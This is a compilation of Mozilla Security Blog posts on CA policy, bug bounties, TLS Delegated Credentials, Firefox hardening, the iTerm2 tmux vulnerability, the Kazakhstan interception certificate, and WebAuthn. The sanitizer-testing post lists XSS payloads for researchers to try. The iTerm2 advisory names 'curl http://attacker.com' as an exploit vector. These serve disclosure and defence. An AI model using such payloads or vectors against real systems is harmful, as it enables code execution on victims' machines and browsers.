Announcing Version 2.7 of the Mozilla Root Store Policy

After many months of discussion on the mozilla.dev.security.policy mailing list, our Root Store Policy governing Certificate Authorities (CAs) that are trusted in Mozilla products has been updated. Version 2.7 has an effective date of January 1st, 2020.

More than a dozen issues were addressed in this update, including the following changes:

  • Beginning on July 1, 2020, end-entity certificates MUST include an Extended Key Usage (EKU) extension containing KeyPurposeId(s) describing the intended usage(s) of the certificate, and the EKU extension MUST NOT contain the KeyPurposeId anyExtendedKeyUsage. This requirement is driven by the issues we’ve had with non-TLS certificates that are technically capable of being used for TLS. Some CAs have argued that certificates not intended for TLS usage are not required to comply with TLS policies; however, it is not possible to enforce policy based on intention alone.
  • Certificate Policy and Certification Practice Statement (CP/CPS) versions dated after March 2020 can’t contain blank sections and must – in accordance with RFC 3647 – only use “No Stipulation” to mean that no requirements are imposed. That term cannot be used to mean that the section is “Not Applicable”. For example, “No Stipulation” in section 3.2.2.6 “Wildcard Domain Validation” means that the policy allows wildcard certificates to be issued.
  • Section 8 “Operational Changes” will apply to unconstrained subordinate CA certificates chaining up to root certificates in Mozilla’s program. With this change, any new unconstrained subordinate CA certificate that is transferred to, or signed for, an organization that doesn’t already have control of a subordinate CA certificate must undergo a public discussion before issuing certificates.
  • We’ve seen a number of instances in which a CA has multiple policy documents and there is no clear way to determine which policies apply to which certificates. Under our new policy, CAs must provide a way to clearly determine which CP/CPS applies to each root and intermediate certificate. This may require changes to CAs’ policy documents.
  • Mozilla already has a “required practice” that forbids delegation of email validation to third parties for S/MIME certificates. With this update, we add this requirement to our policy. Specifically, CAs must not delegate validation of the domain part of an email address to a third party.
  • We’ve also added specific S/MIME revocation requirements to the policy in place of the existing unclear requirement for S/MIME certificates to follow the BR 4.9.1 revocation requirements. The new policy does not include specific requirements on the time in which S/MIME certificates must be revoked.

Other changes include:

  • Detail the permitted signature algorithms and encodings for RSA keys and ECDSA keys in sections 5.1.1 and 5.1.2 (along with a note that Firefox does not currently support RSASSA-PSS encodings).
  • Add the P-521 exclusion in section 5.1 of the Mozilla policy to section 2.3 where we list exceptions to the BRs.
  • Change references to “PITRA” in section 8 to “Point-in-Time Audit”, which is what we meant all along.
  • Update required minimum versions of audit criteria in section 3.1.
  • Formally require incident reporting.

A comparison of all the policy changes is available here.

A few of these changes may require that CAs revise their CP/CPS(s). Mozilla will send a CA Communication to alert CAs of the necessary changes, and ask CAs to provide the date by which their CP/CPS documents will be compliant.

We have also recently updated the Common CA Database (CCADB) Policy to provide specific guidance to CAs and auditors on audit statements. As a repository of information about publicly-trusted CAs, CCADB now automatically processes audit statements submitted by CAs. The requirements added in section 5.1 of the policy help to ensure that the automated processing is successful.

Help Test Firefox’s built-in HTML Sanitizer to protect against UXSS bugs

I recently gave a talk at OWASP Global AppSec in Amsterdam and summarized the presentation in a blog post about how to achieve “critical”-rated code execution vulnerabilities in Firefox with user-interface XSS. The end of that blog post encourages the reader to participate in the bug bounty program, but it did not come with proper instructions. This blog post will describe the mitigations Firefox has in place to protect against XSS bugs and how to test them.

Our about: pages are privileged pages that control the browser (e.g., about:preferences, which contains Firefox settings). To gain arbitrary code execution, a successful XSS exploit has to bypass both the Content Security Policy (CSP), which we have recently added, and our built-in HTML sanitizer. A bypass of the sanitizer without a CSP bypass is in itself a severe enough security bug to warrant a bounty, subject to the discretion of the Bounty Committee. See the bounty pages for more information, including how to submit findings.

How the Sanitizer works

The Sanitizer runs in the so-called “fragment parsing” step of innerHTML. In more detail, whenever someone uses innerHTML (or similar functionality that parses a string from JavaScript into HTML) the browser builds a DOM tree data structure. Before the newly parsed structure is appended to the existing DOM element, our sanitizer intervenes. This step ensures that there can be no mismatch between what our sanitizer sees and what the actual parser would have created – because it operates on the output of the actual parser itself.

The line of code that triggers the sanitizer is in nsContentUtils::ParseFragmentHTML and nsContentUtils::ParseFragmentXML. The aforementioned link points to a specific source code revision, to make hotlinking easier. Please click the file name at the top of the page to get to the newest revision of the source code.

The sanitizer is implemented as an allow-list of elements, attributes and attribute values in nsTreeSanitizer.cpp. Please consult the allow-list before testing.

Finding a Sanitizer bypass is a hunt for Mutated XSS (mXSS) bugs in Firefox – unless you find an element in our allow-list that has recently become capable of running script.

How and where to test

A browser is a complicated application consisting of millions of lines of code. If you want to find new security issues, you should test the latest development version. We often rewrite lots of code that isn’t directly related to the issue you are testing but might still have a side effect, so to make sure your bug actually affects end users, test Firefox Nightly. Otherwise, the issues you find in Beta or Release might have already been fixed in Nightly.

Sanitizer runs in all privileged pages

Some of Firefox’s internal pages have more privileges than regular web pages. For example about:config allows the user to modify advanced browser settings and hence relies on those expanded privileges.

Just open a new tab and navigate to about:config. Because it has access to privileged APIs, it cannot use innerHTML (and related functionality like outerHTML and so on) without going through the sanitizer.

Using Developer Tools to emulate a vulnerability

From about:config, open the Developer Tools console (go to Tools in the menu bar, select Web Developer, then Web Console (Ctrl+Shift+K)).

To emulate an XSS vulnerability, type this into the console:

document.body.innerHTML = '<img src=x onerror=alert(1)>'

Observe how Firefox sanitizes the HTML markup by looking at the error in the console:

“Removed unsafe attribute. Element: img. Attribute: onerror.”

You may now go and try other variants of XSS against this sanitizer. Again, try finding an mXSS bug or identifying an allowed combination of element and attribute that executes script.
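
If you’d like a quick starting point for such experiments, below is a minimal sketch you can paste into the Web Console on a privileged page. The payloads are just well-known illustrative probes, not known bypasses, and you should expect the sanitizer to neutralize every one of them:

// Each assignment goes through the fragment parser and the sanitizer;
// watch the console for "Removed unsafe ..." messages.
const payloads = [
  '<svg onload=alert(1)>',                                    // event handler attribute
  '<a href="javascript:alert(1)">x</a>',                      // javascript: URL in an attribute value
  '<iframe srcdoc="<img src=x onerror=alert(1)>"></iframe>',  // nested document content
  '<math><style><img src=x onerror=alert(1)></style></math>', // mXSS-style mutation probe
];
for (const p of payloads) {
  document.body.innerHTML = p;
}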

Finding an actual XSS vulnerability

Right, so for now we have emulated the Cross-Site Scripting (XSS) vulnerability by typing in innerHTML ourselves in the Web Console. That’s pretty much cheating. But as I said above: What we want to find are sanitizer bypasses. This is a call to test our mitigations.

But if you still want to find real XSS bugs in Firefox, I recommend you run some sort of smart static analysis on the Firefox JavaScript code. And by smart, I probably do not mean eslint-plugin-no-unsanitized.

Summary

This blog post described the mitigations Firefox has in place to protect against XSS bugs. These bugs can lead to remote code execution outside of the sandbox. We encourage the wider community to double check our work and look for omissions. This should be particularly interesting for people with a web security background, who want to learn more about browser security. Finding severe security bugs is very rewarding and we’re looking forward to getting some feedback. If you find something, please consult the Bug Bounty pages on how to report it.

Updates to the Mozilla Web Security Bounty Program

Mozilla was one of the first companies to establish a bug bounty program and we continually adjust it so that it stays as relevant now as it always has been. To celebrate the 15th anniversary of the Firefox 1.0 release, we are making significant enhancements to the web bug bounty program.

Increasing Bounty Payouts

We are doubling all web payouts for critical, core and other Mozilla sites, as per the Web and Services Bug Bounty Program page. In addition, we are tripling the payout for Remote Code Execution on critical sites to $15,000!

Adding New Critical Sites to the Program

As we are constantly improving the services behind Firefox, we also need to ensure that sites we consider critical to our mission get the appropriate attention from the security community. Hence, over the last 6 months we have extended our web bug bounty program to include the following sites:

  • Autograph – a cryptographic signature service that signs Mozilla products.
  • Lando – Mozilla’s new automatic code-landing service which allows us to easily commit Phabricator revisions to their destination repository.
  • Phabricator – a code management tool used for reviewing Firefox code changes.
  • Taskcluster – the task execution framework that supports Mozilla’s continuous integration and release processes (promoted from core to critical).

Adding New Core Sites to the Program

The list of sites we consider core to our mission has also been extended to include:

  • Firefox Monitor – a site where you can register your email address so that you can be informed if your account details are part of a data breach.
  • Localization – a service contributors can use to help localize Mozilla products.
  • Payment Subscription – a service that is used as the interface in front of the payment provider (Stripe).
  • Firefox Private Network – a site from which you can download a desktop extension that helps secure and protect your connection everywhere you use Firefox.
  • Ship It – a system that accepts requests for releases from humans and translates them into information and requests that our Buildbot-based release automation can process.
  • Speak To Me – Mozilla’s Speech Recognition API.

The new payouts have already been applied to the most recently reported web bugs.

We hope the new sites and increased payments will encourage you to have another look at our sites and help us keep them safe for everyone who uses the web.

Happy Birthday, Firefox. And happy bug hunting to you all!

Adding CodeQL and clang to our Bug Bounty Program

At GitHub Universe, GitHub announced the GitHub Security Lab, an initiative to help secure open source software alongside the community and an initial set of partners including Mozilla. As part of this announcement, GitHub is providing free access to CodeQL, a security research tool which makes it easier to identify flaws in open source software. Mozilla has used these tools privately for the past two years and has been very impressed and hopeful about how they will improve software security. Mozilla recognizes the need to scale security to work automatically, and to tighten the feedback loop in the development <-> security auditing/engineering process.

One of the ways we’re supporting this initiative at Mozilla is through renewed investment in automation and static analysis. We think the broader Mozilla community can participate, and we want to encourage it. Today, we’re announcing a new area of our bug bounty program to encourage the community to use the CodeQL tools. We are exploring the use of CodeQL tools and will award a bounty – above and beyond our existing bounties – for static analysis work that identifies present or historical flaws in Firefox.

The highlights of the bounty are:

  • We will accept static analysis queries written in CodeQL or as clang-based checkers (clang analyzer, clang plugin using the AST API or clang-tidy).
  • Each previously unknown security vulnerability your query matches will be eligible for a bug bounty per the normal policy.
  • The query itself will also be eligible for a bounty, the amount dependent upon the quality of the submission.
  • Queries that match historical issues but do not find new vulnerabilities are eligible. This means you can look through our historical advisories to find examples of issues you can write queries for.
  • Mozilla’s and GitHub’s bug bounties are compatible, not exclusive, so if you meet the requirements of both, you are eligible to receive bounties from both. (More details below.)
  • The full details of this program are available at our bug bounty program’s homepage.

When fixing any security bug, retrospective is an important part of the remediation process which should provide answers to the following questions: Was this the only instance of this issue? Is this flaw representative of a wider systemic weakness that needs to be addressed? And most importantly: can we prevent an issue like this from ever occurring again? Variant analysis, driven manually, is usually the way to answer the first two questions. And static analysis, integrated in the development process, is one of the best ways to answer the third.

Besides our existing clang analyzer checks, we’ve made use of CodeQL over the past two years to do variant analysis. The tool can identify bugs both through targeted, zero-false-positive queries and through more expansive queries whose results give manual analysis a more complete and less noisy starting point than simple string matching. To see examples of where we’ve successfully used CodeQL, we have a meta tracking bug that illustrates the types of bugs we’ve identified.

We hope that security researchers will try out CodeQL too, and share both their findings and their experience with us. And of course regardless of how you find a vulnerability, you’re always welcome to submit bugs using the regular bug bounty program. So if you have custom static analysis tools, fuzzers, or just the mainstay of grep and coffee – you’re always invited.

Getting Started with CodeQL

GitHub is publishing a guide covering how to use CodeQL at https://securitylab.github.com/tools/codeql

Getting Started with Clang Analyzer

We currently have a number of custom-written checks in our source tree. So the easiest way to write and run your query is to build Firefox, add ‘ac_add_options --enable-clang-plugin’ to your mozconfig, add your check, and then ‘./mach build’ again.

To learn how to add your check, you can review this recent bug that added a couple of new checks – it shows how to add a new plugin to Checks.inc, ChecksIncludes.inc, and additionally how to add tests. This particular plugin also adds a couple of attributes that can be used in the codebase, which your plugin may or may not need. Note that depending on how you view the diffs, it may appear that the author modified existing files, but actually they copied an existing file, then modified the copy.

Future of CodeQL and clang within our Bug Bounty program

We retain the ability to be flexible. We’re planning to evaluate the effectiveness of the program when we reach $75,000 in rewards or after a year. After all, this is something new for us and for the bug bounty community. We—and GitHub—welcome your communication and feedback on the plan, especially candid feedback. If you’ve developed a query that you consider more valuable than what you think we’d reward – we would love to hear that. (If you’re keeping the query, hopefully you’re submitting the bugs to us so we can see that we are not meeting researcher expectations on reward.) And if you spent hours trying to write a query but couldn’t get over the learning curve – tell us and show us what problems you encountered!

We’re excited to see what the community can do with CodeQL and clang; and how we can work together to improve on our ability to deliver a browser that answers to no one but you.

Validating Delegated Credentials for TLS in Firefox

At Mozilla we are well aware of how fragile the Web Public Key Infrastructure (PKI) can be. From fraudulent Certification Authorities (CAs) to implementation errors that leak private keys, users, often unknowingly, are put in a position where their ability to establish trust on the Web is compromised. Therefore, in keeping with our mission to create a Web where individuals are empowered, independent and safe, we welcome ideas that are aimed at making the Web PKI more robust. With initiatives like our Common CA Database (CCADB), CRLite prototyping, and our involvement in the CA/Browser Forum, we’re committed to this objective, and this is why we embraced the opportunity to partner with Cloudflare to test Delegated Credentials for TLS in Firefox, which is currently undergoing standardization at the IETF.

As CAs are responsible for the creation of digital certificates, they dictate the lifetime of an issued certificate, as well as its usage parameters. Traditionally, end-entity certificates are long-lived, exhibiting lifetimes of more than one year. For server operators making use of Content Delivery Networks (CDNs) such as Cloudflare, this can be problematic because of the potential trust placed in CDNs regarding sensitive private key material. Of course, Cloudflare has architectural solutions for such key material, but these add unwanted latency to connections and present operational difficulties. To limit exposure, a short-lived certificate would be preferable in this setting. However, constant communication with an external CA to obtain short-lived certificates could result in poor performance or, even worse, lack of access to a service entirely.

The Delegated Credentials mechanism decentralizes the problem by allowing a TLS server to issue short-lived authentication credentials (with a validity period of no longer than 7 days) that are cryptographically bound to a CA-issued certificate. These short-lived credentials then serve as the authentication keys in a regular TLS 1.3 connection between a Firefox client and a CDN edge server situated in a low-trust zone (where the risk of compromise might be higher than usual and perhaps go undetected). This way, performance isn’t hindered and the compromise window is limited. For further technical details see this excellent blog post by Cloudflare on the subject.

See How The Experiment Works

We will soon test Delegated Credentials in Firefox Nightly via an experimental addon, called TLS Delegated Credentials Experiment. In this experiment, the addon will make a single request to a Cloudflare-managed host which supports Delegated Credentials. The Delegated Credentials feature is disabled in Firefox by default, but depending on the experiment conditions the addon will toggle it for the duration of this request. The connection result, including whether Delegated Credentials was enabled or not, gets reported via telemetry to allow for comparative study. Out of this we’re hoping to gain better insights into how effective and stable Delegated Credentials are in the real world, and more importantly, of any negative impact to user experience (for example, increased connection failure rates or slower TLS handshake times). The study is expected to start in mid-November and run for two weeks.

For specific details on the telemetry and how measurements will take place, see bug 1564179.

See The Results In Firefox

You can open a Firefox Nightly or Beta window and navigate to about:telemetry. From here, in the top-right is a Search box, where you can search for “delegated” to find all telemetry entries from our experiment. If Delegated Credentials have been used and telemetry is enabled, you can expect to see the count of Delegated Credentials-enabled handshakes as well as the time-to-completion of each. Additionally, if the addon has run the test, you can see the test result under the “Keyed Scalars” section.

Delegated Credentials telemetry in Nightly 72

You can also read more about telemetry, studies, and Mozilla’s privacy policy by navigating to about:preferences#privacy.

See It In Action

If you’d like to enable Delegated Credentials for your own testing or use, this can be done by:

  1. In a Firefox Nightly or Beta window, navigate to about:config.
  2. Search for the “security.tls.enable_delegated_credentials” preference – the preference list will update as you type, and “delegated” is itself enough to find the correct preference.
  3. Click the Toggle button to set the value to true.
  4. Navigate to https://dc.crypto.mozilla.org/
  5. If needed, toggling the value back to false will disable Delegated Credentials.

Note that currently, use of Delegated Credentials doesn’t appear anywhere in the Firefox UI. This will change as we evolve the implementation.
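
If you plan to test repeatedly, you can also set the preference from a user.js file in your test profile instead of toggling it by hand. This is just a convenience sketch using the preference name shown above; use a disposable profile, since the file is re-applied on every startup:

// user.js in the profile directory – applies the preference at each startup.
user_pref("security.tls.enable_delegated_credentials", true);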

We would sincerely like to thank Christopher Patton, fellow Mozillian Wayne Thayer, and the Cloudflare team, particularly Nick Sullivan and Watson Ladd, for helping us to get to this point with the Delegated Credentials feature. The Mozilla team will keep you informed on the development of this feature for use in Firefox, and we look forward to sharing our results in a future blog post.

Improved Security and Privacy Indicators in Firefox 70

The upcoming Firefox 70 release will update the security and privacy indicators in the URL bar.

In recent years we have seen a great increase in the number of websites that are delivered securely via HTTPS. At the same time, privacy threats have become more prevalent on the web and Firefox has shipped new technologies to protect our users against tracking.

To better reflect this new environment, the updated UI takes a step towards treating secure HTTPS as the default method of transport for websites, instead of a way to identify website security. It also puts greater emphasis on user privacy.

This post will outline the major changes to our primary security indicators:

  • A new permanent “protections” icon to access information about the restrictions Firefox is applying to the page to protect your privacy.
  • A new crossed-out lock icon as an indicator for insecure HTTP and a new color for the lock icon that marks sites delivered securely.
  • A new placement for Extended Validation (EV) indicators.

Streamlining Security and Identity Indicators

Firefox traditionally marked sites delivered via a secure transport mechanism with a green lock icon. Sites delivered via insecure mechanisms got no additional security indicators. All sites were marked with an “information” icon, which served as an access point for more site information.

Before and after comparison of new identity icons

As part of the changes in Firefox 70, we will start showing a crossed-out lock icon as a permanent indicator for sites delivered via the insecure protocols HTTP and FTP. Over two years ago, we started showing this indicator for insecure login pages. We also announced our intent to expand its use by showing a negative indicator for all HTTP pages as HTTPS adoption increases. By now, Firefox loads about 80% of pages via HTTPS.

The formerly green lock icon will now become gray, with the intention of de-emphasizing the default (secure) connection state and instead putting more emphasis on broken or insecure connections.

We will remove the “information” icon. The lock icon will be the new entry point for accessing security and identity information about the website.

Moving the EV indicator out of the URL Bar

A recent study by Thompson et al. shows that displaying the company name and country in the URL bar when a website uses an Extended Validation TLS certificate does not provide additional security. One of the biggest downsides of this approach is that it requires the user to notice the absence of the EV indicator on a malicious site. Furthermore, it has been demonstrated that EV certificates with colliding entity names can be generated by choosing a different jurisdiction.

As a result, we will relocate the EV indicator to the “Site Information” panel that is accessed by clicking on the lock icon. This change will hide the indicator from the majority of our users while keeping it accessible for those who need to access it. It also avoids ambiguities that could previously arise when the entity name in the URL bar was cut off to make space for the URL.

Image showing the new EV Indicator in the identity panel

Adding a new Protections Icon

The protections icon will be the entry point for the privacy properties of every page. It lets the user know about trackers or cryptominers on the page and how Firefox restricts them to improve privacy and performance. The icon will have 3 different states.

An overview of the different protection icons

Protections Enabled
When no tracking activity is detected and protections are not necessary, the shield shows in gray.

Protections Active
When protections are active on the current page, the shield displays a very subtle animation and adopts the purple gradient.

Protections Disabled
When the user has disabled protections for the site, the shield shows with a strike-through.

We are excited to roll out this improved new UI and will continue to evolve the indicators to give Firefox users an easy way to assess their privacy and security anywhere on the modern web.

A big thank you to all the individuals who contributed to this effort.

Hardening Firefox against Injection Attacks

A proven and effective way to counter code injection attacks is to reduce the attack surface by removing potentially dangerous artifacts from the codebase, hardening the code at various levels. To make Firefox resilient against such code injection attacks, we removed occurrences of inline scripts as well as eval()-like functions.

Removing Inline Scripts and adding Guards to prevent Inline Script Execution

Firefox not only renders web pages on the internet but also ships with a variety of built-in pages, commonly referred to as about: pages. Such about: pages provide an interface to reveal the internal state of the browser. Most prominent is about:config, which exposes an API to inspect and update preferences and settings, allowing Firefox users to tailor their Firefox instance to their specific needs.

Since such about: pages are also implemented using HTML and JavaScript, they are subject to the same security model as regular web pages and therefore are not immune to code injection attacks. More figuratively, if an attacker manages to inject code into such an about: page, it potentially allows the attacker to execute the injected script code in the security context of the browser itself, performing arbitrary actions on behalf of the user.

To better protect our users and to add an additional layer of security to Firefox, we rewrote all inline event handlers and moved all inline JavaScript code to packaged files for all 45 about: pages. This allowed us to apply a strong Content Security Policy (CSP) such as ‘default-src chrome:’ which ensures that injected JavaScript code does not execute. Instead JavaScript code only executes when loaded from a packaged resource using the internal chrome: protocol. Not allowing any inline script in any of the about: pages limits the attack surface of arbitrary code execution and hence provides a strong first line of defense against code injection attacks.
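
To give a flavor of what that rewrite looks like in practice, here is a simplified, hypothetical before/after sketch (the element ID, function name, and markup are made up for illustration and are not taken from Firefox):

// Before: the about: page markup carried the handler inline –
//   <button id="clear-data" onclick="clearSiteData();">Clear</button>
// After: the markup is script-free –
//   <button id="clear-data">Clear</button>
// – and a packaged script, loaded from a chrome: URL and therefore
// permitted by the CSP, wires the handler up at runtime:
function clearSiteData() {
  // ... the actual work lives in packaged, reviewed code ...
}
document.getElementById("clear-data")
  .addEventListener("click", clearSiteData);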

Removing eval()-like Functions and adding Runtime Assertions to prevent eval()

The JavaScript function eval(), along with the similar ‘new Function’ and ‘setTimeout()/setInterval()’, is a powerful yet dangerous tool. It parses and executes an arbitrary string in the same security context as itself. This execution scheme conveniently allows executing code generated at runtime or stored in non-script locations like the Document-Object Model (DOM). The downside however is that ‘eval()’ introduces significant attack surface for code injection and we discourage its use in favour of safer alternatives.
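
To make the distinction concrete, here is a generic sketch (not code from Firefox) contrasting the risky pattern with the safer alternatives we prefer:

// Risky pattern: evaluating strings as code.
//   eval(untrustedString);
//   setTimeout("refresh()", 1000);

// Safer alternatives: treat data as data and pass function references.
const untrustedString = '{"theme": "dark"}';
const config = JSON.parse(untrustedString);   // parse JSON instead of eval()
function refresh() {
  console.log("refreshing with theme:", config.theme);
}
setTimeout(refresh, 1000);                    // function reference, not a string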

To further minimize the attack surface in Firefox and discourage the use of eval(), we rewrote all uses of ‘eval()’-like functions from system privileged contexts and from the parent process in the Firefox codebase. Additionally, we added assertions disallowing the use of ‘eval()’ and its relatives in system-privileged script contexts.

Unexpectedly, in our effort to monitor and remove all eval()-like functions we also encountered calls to eval() outside of our codebase. For some background, a long time ago, Firefox supported a mechanism which allowed you to execute user-supplied JavaScript in the execution context of the browser. Back then this feature, now considered a security risk, allowed you to customize Firefox at start-up time and was called userChrome.js. After that mechanism was removed, users found a way to accomplish the same thing through a few other unintended tricks. Unfortunately we have no control over what users put in these customization files, but our runtime checks confirmed that in a few rare cases they included eval. When we detect that the user has enabled such tricks, we disable our blocking mechanism and allow the usage of eval().

Going forward, the eval() assertions we introduced will continue to inform the Mozilla Security Team of as-yet-unknown instances of eval(), which we will closely audit, evaluate, and restrict as we further harden the Firefox security landscape.

For the Mozilla Security Team,
Vinothkumar Nagasayanan, Jonas Allmann, Tom Ritter, and Christoph Kerschbaumer

 

Critical Security Issue identified in iTerm2 as part of Mozilla Open Source Audit

A security audit funded by the Mozilla Open Source Support Program (MOSS) has discovered a critical security vulnerability in the widely used macOS terminal emulator iTerm2. After finding the vulnerability, Mozilla, Radically Open Security (ROS, the firm that conducted the audit), and iTerm2’s developer George Nachman worked closely together to develop and release a patch to ensure users were no longer subject to this security threat. All users of iTerm2 should update immediately to the latest version (3.3.6) which has been published concurrent with this blog post.

Founded in 2015, MOSS broadens access, increases security, and empowers users by providing catalytic support to open source technologists. Track III of MOSS — created in the wake of the 2014 Heartbleed vulnerability — supports security audits for widely used open source technologies like iTerm2. Mozilla is an open source company, and the funding MOSS provides is one of the key ways that we continue to ensure the open source ecosystem is healthy and secure.

iTerm2 is one of the most popular terminal emulators in the world, and frequently used by developers. MOSS selected iTerm2 for a security audit because it processes untrusted data and it is widely used, including by high-risk targets (like developers and system administrators).

During the audit, ROS identified a critical vulnerability in the tmux integration feature of iTerm2; this vulnerability has been present in iTerm2 for at least 7 years. An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer. Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative examples.

Proof-of-Concept video of a command being run on a mock victim’s machine after connecting to a malicious SSH server. In this case, only a calculator was opened as a placeholder for other, more nefarious commands.

Typically this vulnerability would require some degree of user interaction or trickery, but because it can be exploited via commands generally considered safe, there is a high degree of concern about the potential impact.

An update to iTerm2 is now available with a mitigation for this issue, which has been assigned CVE-2019-9535. While iTerm2 will eventually prompt you to update automatically, we recommend you proactively update by going to the iTerm2 menu and choosing Check for updates… The fix is available in version 3.3.6. A prior update was published earlier this week (3.3.5); it does not contain the fix.

If you’d like to apply for funding or an audit from MOSS, you can find application links on the MOSS website.

Protecting our Users in Kazakhstan

Russian translation: If you would like to read this text in Russian, click here.

Kazakh translation: Read this post in Kazakh here.

In July, a Firefox user informed Mozilla of a security issue impacting Firefox users in Kazakhstan: They stated that Internet Service Providers (ISPs) in Kazakhstan had begun telling their customers that they must install a government-issued root certificate on their devices. What the ISPs didn’t tell their customers was that the certificate was being used to intercept network communications. Other users and researchers confirmed these claims, and listed 3 dozen popular social media and communications sites that were affected.

The security and privacy of HTTPS encrypted communications in Firefox and other browsers relies on trusted Certificate Authorities (CAs) to issue website certificates only to someone who controls the domain name or website. For example, you and I can’t obtain a trusted certificate for www.facebook.com because Mozilla has strict policies for all CAs trusted by Firefox that only allow an authorized person to get a certificate for that domain. However, when a user in Kazakhstan installs the root certificate provided by their ISP, they are choosing to trust a CA that doesn’t have to follow any rules and can issue a certificate for any website to anyone. This enables the interception and decryption of network communications between Firefox and the website, sometimes referred to as a Monster-in-the-Middle (MITM) attack.

We believe this act undermines the security of our users and the web, and it directly contradicts Principle 4 of the Mozilla Manifesto that states, “Individuals’ security and privacy on the internet are fundamental and must not be treated as optional.”

To protect our users, Firefox, together with Chrome, will block the use of the Kazakhstan root CA certificate. This means that it will not be trusted by Firefox even if the user has installed it. We believe this is the appropriate response because users in Kazakhstan are not being given a meaningful choice over whether to install the certificate and because this attack undermines the integrity of a critical network security mechanism. When attempting to access a website that responds with this certificate, Firefox users will see an error message stating that the certificate should not be trusted.

We encourage users in Kazakhstan affected by this change to research the use of virtual private network (VPN) software, or the Tor Browser, to access the Web. We also strongly encourage anyone who followed the steps to install the Kazakhstan government root certificate to remove it from your devices and to immediately change your passwords, using a strong, unique password for each of your online accounts.

Web Authentication in Firefox for Android

Firefox for Android (Fennec) now supports the Web Authentication API as of version 68. WebAuthn blends public-key cryptography into web application logins, and is our best technical response to credential phishing. Applications leveraging WebAuthn gain new second-factor and “passwordless” biometric authentication capabilities. Now, Firefox for Android matches our support for Passwordless Logins using Windows Hello. As a result, even while mobile you can still obtain the highest level of anti-phishing account security.

Firefox for Android uses your device’s native capabilities: On certain devices, you can use built-in biometrics scanners for authentication. You can also use security keys that support Bluetooth, NFC, or can be plugged into the phone’s USB port.

The attached video shows the usage of Web Authentication with a built-in fingerprint scanner: The demo website enrolls a new security key in the account using the fingerprint, and then subsequently logs in using that fingerprint (and without requiring a password).
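
If you want to try the API yourself, here is a minimal sketch of the kind of enrollment call such a demo site might make. The relying-party name, user details, and challenge below are placeholders; a real deployment must generate the challenge on the server and verify the response there:

// Run on a page served over HTTPS; Firefox will prompt for the
// fingerprint scanner or a connected security key.
const publicKey = {
  challenge: crypto.getRandomValues(new Uint8Array(32)), // placeholder – must come from the server
  rp: { name: "Example Site" },
  user: {
    id: new TextEncoder().encode("demo-user"),
    name: "demo-user@example.com",
    displayName: "Demo User",
  },
  pubKeyCredParams: [{ type: "public-key", alg: -7 }],    // ES256
};
navigator.credentials.create({ publicKey })
  .then(credential => console.log("Registered credential:", credential.id))
  .catch(error => console.error("Registration failed:", error));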

Adoption of Web Authentication by major websites is underway: Google, Microsoft, and Dropbox all support WebAuthn via their respective Account Security Settings’ “2-Step Verification” menu.

A few notes

For technical reasons, Firefox for Android does not support the older, backwards-compatible FIDO U2F JavaScript API, which we enabled on Desktop earlier in 2019. For details as to why, see bug 1550625.

Currently Firefox Preview for Android does not support Web Authentication. As Preview matures, Web Authentication will be joining its feature set.